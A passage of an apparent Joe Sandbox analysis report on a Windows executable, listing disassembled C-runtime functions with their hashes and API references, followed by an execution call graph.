                                                      • Instruction Fuzzy Hash: F5119175A08782D6FB10EB56F44105AF7A0FB88BC0F580275EE8D43B68CE3CD6458B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF35A30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$sqrt
                                                      • API String ID: 1757819995-799759792
                                                      • Opcode ID: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction ID: fca5e2d78c0cc59279e532fff4f4caa7775ecca25265903381d18a3d09032eae
                                                      • Opcode Fuzzy Hash: 3f9dd20109ce663b1f944da5101627329bdddfc87ab4d9b7372b39309db0ff23
                                                      • Instruction Fuzzy Hash: 22119876D18B8696EF01DF15954133AA361BFD67E4F508331E96D0A6C8EF3DE041AB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF114A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction ID: 826746e693e12f69c8ebf4588106ba76179f9cde4031aae8a79499e9b4b19d2c
                                                      • Opcode Fuzzy Hash: a34883132ee60a7a0e3e92ecfa04519025266e22849bdfec6dc3f932667f2681
                                                      • Instruction Fuzzy Hash: 35118F3AA08B4692FF60AF15E400269B7E0FB88B94F984274DE8D07B55DF3CD551CB04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF3F010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$exp
                                                      • API String ID: 1757819995-2878093337
                                                      • Opcode ID: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction ID: aebc861e72e624f1f2aab511dd5d9815b402c5841965705e1a3b405d9fa179dc
                                                      • Opcode Fuzzy Hash: 9fdd603b76a48d23854c83fa128c3ec0a1d065c38e77db87c8ff278af7f6c3ee
                                                      • Instruction Fuzzy Hash: A501CC7AD28B8997F320DF24D4461AAB760FFEA344F601315E7441A670C77ED4859B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AEA88E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage_free_nolock
                                                      • String ID: system error %d
                                                      • API String ID: 3491801694-1688351658
                                                      • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction ID: 20c8f41a6b61ca43b3bd5a7f5db3cc8df46b9100396018f5abe470a6137a303f
                                                      • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction Fuzzy Hash: 39014036A1868392FB60FB51F44636AF3A0FBC8784F804075E68D07A59DF3DE4089B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39A64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: DefaultUsertry_get_function
                                                      • String ID: GetUserDefaultLocaleName
                                                      • API String ID: 3217810228-151340334
                                                      • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction ID: aa059320cb5d0bf276ad73499a2b053f184e4ced98ee3c1414a681c79318998c
                                                      • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction Fuzzy Hash: 3EF0BE59F08143A2FF04BB91B5961B8A2A2AF8C7C0FC440B5D90E02A91CE3CE649A320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39AF9
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF73AF3D7C2,?,?,00000000,00007FF73AF3D6BA,?,?,?,00007FF73AF2B0BD), ref: 00007FF73AF39B13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 539475747-3084827643
                                                      • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction ID: d3989b357ca29f7c7bfc2324c27914207124bd4a078dded6654724bd125873da
                                                      • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction Fuzzy Hash: 28F03069F18A42A1FB547B51A4820A9A220EF48BC0F8844B5E91E03B95CE3CE655D760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AF39828 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39851
                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01,?,?,?,?,00007FF73AF402A3), ref: 00007FF73AF39868
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Valuetry_get_function
                                                      • String ID: FlsSetValue
                                                      • API String ID: 738293619-3750699315
                                                      • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction ID: 484b39ad04f5cdfbfb8f59aaecdc8ecf24aa309d5a4c620ac5b3a1de23d11a2f
                                                      • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction Fuzzy Hash: FFE065A9E08643B1FF047B51E4560B8A221AF88780FC840B5DA2E063D5CE3CE959D320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FF73AE8DEF0 Relevance: 5.1, APIs: 4, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DF1F
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DF83
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DFB9
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8E003
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction ID: 009441c305adcf353c355452ed61f1a9e73f2c6cc38225544a59812db5dd1b04
                                                      • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction Fuzzy Hash: 1B311E7661CB8586DB60EB1AF45126ABBA0F799F98F040166EECD47B25CE2CD2448F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1282
                                                      Total number of Limit Nodes:24
                                                      execution_graph 75676 7ff7b1eaac60 75677 7ff7b1eaacc7 75676->75677 75678 7ff7b1eaac7d GetModuleHandleW 75676->75678 75686 7ff7b1eaab58 75677->75686 75678->75677 75679 7ff7b1eaac8a 75678->75679 75679->75677 75700 7ff7b1eaad68 GetModuleHandleExW 75679->75700 75682 7ff7b1eaad09 75684 7ff7b1eaad1b 75706 7ff7b1eb91ac EnterCriticalSection 75686->75706 75688 7ff7b1eaab74 75689 7ff7b1eaab90 25 API calls 75688->75689 75690 7ff7b1eaab7d 75689->75690 75691 7ff7b1eb9200 _isindst LeaveCriticalSection 75690->75691 75692 7ff7b1eaab85 75691->75692 75692->75682 75693 7ff7b1eaad1c 75692->75693 75707 7ff7b1ebd484 75693->75707 75696 7ff7b1eaad56 75697 7ff7b1eaad68 3 API calls 75696->75697 75699 7ff7b1eaad5d ExitProcess 75697->75699 75698 7ff7b1eaad45 GetCurrentProcess TerminateProcess 75698->75696 75701 7ff7b1eaadad 75700->75701 75702 7ff7b1eaad8e GetProcAddress 75700->75702 75704 7ff7b1eaadb7 FreeLibrary 75701->75704 75705 7ff7b1eaadbd 75701->75705 75702->75701 75703 7ff7b1eaada5 75702->75703 75703->75701 75704->75705 75705->75677 75708 7ff7b1ebd4a2 75707->75708 75709 7ff7b1eaad29 75707->75709 75711 7ff7b1eb9550 75708->75711 75709->75696 75709->75698 75714 7ff7b1eb9378 75711->75714 75715 7ff7b1eb93d9 75714->75715 75722 7ff7b1eb93d4 try_get_function 75714->75722 75715->75709 75716 7ff7b1eb9408 LoadLibraryW 75718 7ff7b1eb9429 GetLastError 75716->75718 75716->75722 75717 7ff7b1eb94bc 75717->75715 75719 7ff7b1eb94ca GetProcAddress 75717->75719 75718->75722 75720 7ff7b1eb94db 75719->75720 75720->75715 75721 7ff7b1eb94a1 FreeLibrary 75721->75722 75722->75715 75722->75716 75722->75717 75722->75721 75723 7ff7b1eb9463 LoadLibraryExW 75722->75723 75723->75722 75724 7ff7b1e8d4e4 75751 7ff7b1e8d6a8 75724->75751 75727 7ff7b1e8d630 75782 7ff7b1e8d9d4 7 API calls 2 library calls 75727->75782 75728 7ff7b1e8d500 __scrt_acquire_startup_lock 75730 7ff7b1e8d63a 75728->75730 75731 7ff7b1e8d51e 75728->75731 75783 7ff7b1e8d9d4 7 API calls 2 library calls 75730->75783 75741 7ff7b1e8d560 __scrt_release_startup_lock 75731->75741 75759 7ff7b1eb675c 75731->75759 75733 7ff7b1e8d645 __CxxCallCatchBlock _free_nolock 75736 7ff7b1e8d543 75738 7ff7b1e8d5c9 75767 7ff7b1e8db20 75738->75767 75740 7ff7b1e8d5ce 75770 7ff7b1eb6688 75740->75770 75741->75738 75779 7ff7b1eaadf8 26 API calls 75741->75779 75749 7ff7b1e8d5f1 75749->75733 75781 7ff7b1e8d83c 7 API calls __scrt_initialize_crt 75749->75781 75750 7ff7b1e8d608 75750->75736 75784 7ff7b1e8dc9c 75751->75784 75754 7ff7b1e8d6d7 75786 7ff7b1eb8760 75754->75786 75758 7ff7b1e8d4f8 75758->75727 75758->75728 75760 7ff7b1eb676f 75759->75760 75761 7ff7b1e8d53f 75760->75761 76061 7ff7b1e8d400 75760->76061 75761->75736 75763 7ff7b1eb66f8 75761->75763 75764 7ff7b1eb6747 75763->75764 75765 7ff7b1eb672d 75763->75765 75764->75741 75765->75764 76143 7ff7b1e8d4c8 75765->76143 76152 7ff7b1e8e110 75767->76152 75769 7ff7b1e8db37 GetStartupInfoW 75769->75740 75771 7ff7b1ec695c 37 API calls 75770->75771 75773 7ff7b1eb6697 75771->75773 75772 7ff7b1e8d5d6 75775 7ff7b1de50e0 75772->75775 75773->75772 76154 7ff7b1ec6c94 26 API calls wcsftime 75773->76154 75776 7ff7b1de50fd 75775->75776 76155 7ff7b1de6b70 75776->76155 75779->75738 75780 7ff7b1e8db64 GetModuleHandleW 75780->75749 75781->75750 75782->75730 75783->75733 75785 7ff7b1e8d6ca __scrt_dllmain_crt_thread_attach 75784->75785 75785->75754 75785->75758 75787 7ff7b1ecad18 75786->75787 75788 7ff7b1e8d6dc 75787->75788 75792 7ff7b1ec68a4 75787->75792 75807 7ff7b1ec695c 75787->75807 75788->75758 75791 7ff7b1e8f154 7 API calls 2 library calls 75788->75791 75791->75758 75793 7ff7b1ec68c7 75792->75793 75794 7ff7b1ec68d1 75793->75794 75822 7ff7b1eb91ac EnterCriticalSection 75793->75822 75797 7ff7b1ec6943 75794->75797 75813 7ff7b1eb87cc 75794->75813 75797->75787 75801 7ff7b1ec695b 75803 7ff7b1ebaa74 26 API calls 75801->75803 75806 7ff7b1ec69ae 75801->75806 75804 7ff7b1ec6998 75803->75804 75805 7ff7b1ec66e4 37 API calls 75804->75805 75805->75806 75806->75787 75808 7ff7b1ec6969 75807->75808 75812 7ff7b1ec69ae 75807->75812 75826 7ff7b1ebaa74 75808->75826 75812->75787 75823 7ff7b1eaa6c0 EnterCriticalSection LeaveCriticalSection __CxxCallCatchBlock 75813->75823 75815 7ff7b1eb87d5 75816 7ff7b1eb87e4 75815->75816 75824 7ff7b1eaa710 26 API calls 5 library calls 75815->75824 75818 7ff7b1eb87ed IsProcessorFeaturePresent 75816->75818 75820 7ff7b1eb8817 __CxxCallCatchBlock 75816->75820 75819 7ff7b1eb87fc 75818->75819 75825 7ff7b1eb8900 6 API calls 3 library calls 75819->75825 75823->75815 75824->75816 75825->75820 75827 7ff7b1ebaa8a 75826->75827 75828 7ff7b1ebaa85 75826->75828 75833 7ff7b1ebaa92 75827->75833 75870 7ff7b1eb9828 6 API calls try_get_function 75827->75870 75869 7ff7b1eb97e0 6 API calls try_get_function 75828->75869 75831 7ff7b1ebaaa9 75831->75833 75871 7ff7b1eb921c 75831->75871 75832 7ff7b1eb87cc __CxxCallCatchBlock 26 API calls 75835 7ff7b1ebab1a 75832->75835 75833->75832 75839 7ff7b1ebab0c 75833->75839 75837 7ff7b1ebaada 75880 7ff7b1eb9828 6 API calls try_get_function 75837->75880 75838 7ff7b1ebaaca 75878 7ff7b1eb9828 6 API calls try_get_function 75838->75878 75851 7ff7b1ec66e4 75839->75851 75842 7ff7b1ebaae2 75844 7ff7b1ebaae6 75842->75844 75845 7ff7b1ebaaf8 75842->75845 75843 7ff7b1ebaad1 75879 7ff7b1eb9294 14 API calls 2 library calls 75843->75879 75881 7ff7b1eb9828 6 API calls try_get_function 75844->75881 75882 7ff7b1eba750 14 API calls _set_fmode 75845->75882 75849 7ff7b1ebab00 75883 7ff7b1eb9294 14 API calls 2 library calls 75849->75883 75852 7ff7b1ec68a4 37 API calls 75851->75852 75853 7ff7b1ec670d 75852->75853 75919 7ff7b1ec63f0 75853->75919 75856 7ff7b1ec6727 75856->75812 75861 7ff7b1ec67c7 75862 7ff7b1ec67ce 75861->75862 75865 7ff7b1ec67f3 75861->75865 75863 7ff7b1eaaef8 _set_fmode 14 API calls 75862->75863 75868 7ff7b1ec67d3 75863->75868 75864 7ff7b1ec6830 75864->75868 75944 7ff7b1ec6234 23 API calls 5 library calls 75864->75944 75865->75864 75943 7ff7b1eb9294 14 API calls 2 library calls 75865->75943 75942 7ff7b1eb9294 14 API calls 2 library calls 75868->75942 75870->75831 75875 7ff7b1eb922d wcsftime 75871->75875 75872 7ff7b1eb927e 75885 7ff7b1eaaef8 75872->75885 75873 7ff7b1eb9262 RtlAllocateHeap 75873->75875 75876 7ff7b1eb927c 75873->75876 75875->75872 75875->75873 75884 7ff7b1ecaddc EnterCriticalSection LeaveCriticalSection wcsftime 75875->75884 75876->75837 75876->75838 75878->75843 75879->75833 75880->75842 75881->75843 75882->75849 75883->75833 75884->75875 75888 7ff7b1ebab1c GetLastError 75885->75888 75887 7ff7b1eaaf01 75887->75876 75889 7ff7b1ebab3e 75888->75889 75890 7ff7b1ebab43 75888->75890 75911 7ff7b1eb97e0 6 API calls try_get_function 75889->75911 75893 7ff7b1ebab4b SetLastError 75890->75893 75912 7ff7b1eb9828 6 API calls try_get_function 75890->75912 75893->75887 75894 7ff7b1ebab66 75894->75893 75895 7ff7b1eb921c _wcsupr_s 12 API calls 75894->75895 75897 7ff7b1ebab79 75895->75897 75898 7ff7b1ebab97 75897->75898 75899 7ff7b1ebab87 75897->75899 75915 7ff7b1eb9828 6 API calls try_get_function 75898->75915 75913 7ff7b1eb9828 6 API calls try_get_function 75899->75913 75902 7ff7b1ebab8e 75914 7ff7b1eb9294 14 API calls 2 library calls 75902->75914 75903 7ff7b1ebab9f 75904 7ff7b1ebabb5 75903->75904 75905 7ff7b1ebaba3 75903->75905 75917 7ff7b1eba750 14 API calls _set_fmode 75904->75917 75916 7ff7b1eb9828 6 API calls try_get_function 75905->75916 75909 7ff7b1ebabbd 75918 7ff7b1eb9294 14 API calls 2 library calls 75909->75918 75912->75894 75913->75902 75914->75893 75915->75903 75916->75902 75917->75909 75918->75893 75945 7ff7b1e93ea8 75919->75945 75922 7ff7b1ec6422 75924 7ff7b1ec6437 75922->75924 75925 7ff7b1ec6427 GetACP 75922->75925 75923 7ff7b1ec6410 GetOEMCP 75923->75924 75924->75856 75926 7ff7b1eba290 75924->75926 75925->75924 75927 7ff7b1eba2db 75926->75927 75931 7ff7b1eba29f wcsftime 75926->75931 75928 7ff7b1eaaef8 _set_fmode 14 API calls 75927->75928 75930 7ff7b1eba2d9 75928->75930 75929 7ff7b1eba2c2 RtlAllocateHeap 75929->75930 75929->75931 75930->75868 75933 7ff7b1ec69d8 75930->75933 75931->75927 75931->75929 75990 7ff7b1ecaddc EnterCriticalSection LeaveCriticalSection wcsftime 75931->75990 75934 7ff7b1ec63f0 28 API calls 75933->75934 75935 7ff7b1ec6a03 75934->75935 75936 7ff7b1ec6a40 IsValidCodePage 75935->75936 75940 7ff7b1ec6a83 __scrt_get_show_window_mode _handle_error 75935->75940 75937 7ff7b1ec6a51 75936->75937 75936->75940 75938 7ff7b1ec6a88 GetCPInfo 75937->75938 75941 7ff7b1ec6a5a __scrt_get_show_window_mode 75937->75941 75938->75940 75938->75941 75940->75861 75991 7ff7b1ec6500 75941->75991 75942->75856 75943->75864 75944->75868 75946 7ff7b1e93ec7 75945->75946 75947 7ff7b1e93ecc 75945->75947 75946->75922 75946->75923 75947->75946 75953 7ff7b1eba9a0 GetLastError 75947->75953 75951 7ff7b1e93f0a 75981 7ff7b1ebac7c 26 API calls wcsftime 75951->75981 75954 7ff7b1eba9c2 75953->75954 75957 7ff7b1eba9c7 75953->75957 75982 7ff7b1eb97e0 6 API calls try_get_function 75954->75982 75958 7ff7b1eba9cf SetLastError 75957->75958 75983 7ff7b1eb9828 6 API calls try_get_function 75957->75983 75963 7ff7b1ebaa6e 75958->75963 75964 7ff7b1e93ee7 75958->75964 75959 7ff7b1eba9ea 75959->75958 75961 7ff7b1eb921c _wcsupr_s 14 API calls 75959->75961 75962 7ff7b1eba9fd 75961->75962 75965 7ff7b1ebaa1b 75962->75965 75966 7ff7b1ebaa0b 75962->75966 75967 7ff7b1eb87cc __CxxCallCatchBlock 24 API calls 75963->75967 75980 7ff7b1ebac48 26 API calls wcsftime 75964->75980 75986 7ff7b1eb9828 6 API calls try_get_function 75965->75986 75984 7ff7b1eb9828 6 API calls try_get_function 75966->75984 75969 7ff7b1ebaa73 75967->75969 75971 7ff7b1ebaa23 75973 7ff7b1ebaa39 75971->75973 75974 7ff7b1ebaa27 75971->75974 75972 7ff7b1ebaa12 75985 7ff7b1eb9294 14 API calls 2 library calls 75972->75985 75988 7ff7b1eba750 14 API calls _set_fmode 75973->75988 75987 7ff7b1eb9828 6 API calls try_get_function 75974->75987 75978 7ff7b1ebaa41 75989 7ff7b1eb9294 14 API calls 2 library calls 75978->75989 75980->75951 75981->75946 75983->75959 75984->75972 75985->75958 75986->75971 75987->75972 75988->75978 75989->75958 75990->75931 75992 7ff7b1ec653d GetCPInfo 75991->75992 75994 7ff7b1ec6633 _handle_error 75991->75994 75993 7ff7b1ec6550 75992->75993 75992->75994 76000 7ff7b1ec92ec 75993->76000 75994->75940 75996 7ff7b1ec65c7 76013 7ff7b1ece6ec 75996->76013 75999 7ff7b1ece6ec 31 API calls 75999->75994 76001 7ff7b1e93ea8 wcsftime 26 API calls 76000->76001 76002 7ff7b1ec932e 76001->76002 76018 7ff7b1ec2ff4 76002->76018 76004 7ff7b1ec9364 76005 7ff7b1eba290 wcsftime 15 API calls 76004->76005 76006 7ff7b1ec936b _handle_error 76004->76006 76008 7ff7b1ec9390 __scrt_get_show_window_mode wcsftime 76004->76008 76005->76008 76006->75996 76007 7ff7b1ec9428 76007->76006 76010 7ff7b1eb9294 __free_lconv_num 14 API calls 76007->76010 76008->76007 76009 7ff7b1ec2ff4 wcsftime MultiByteToWideChar 76008->76009 76011 7ff7b1ec940a 76009->76011 76010->76006 76011->76007 76012 7ff7b1ec940e GetStringTypeW 76011->76012 76012->76007 76014 7ff7b1e93ea8 wcsftime 26 API calls 76013->76014 76015 7ff7b1ece711 76014->76015 76021 7ff7b1ece3d4 76015->76021 76017 7ff7b1ec65fa 76017->75999 76019 7ff7b1ec2ffc MultiByteToWideChar 76018->76019 76022 7ff7b1ece416 76021->76022 76023 7ff7b1ec2ff4 wcsftime MultiByteToWideChar 76022->76023 76025 7ff7b1ece460 76023->76025 76024 7ff7b1ece69f _handle_error 76024->76017 76025->76024 76026 7ff7b1ece493 wcsftime 76025->76026 76027 7ff7b1eba290 wcsftime 15 API calls 76025->76027 76028 7ff7b1ec2ff4 wcsftime MultiByteToWideChar 76026->76028 76030 7ff7b1ece597 76026->76030 76027->76026 76029 7ff7b1ece505 76028->76029 76029->76030 76047 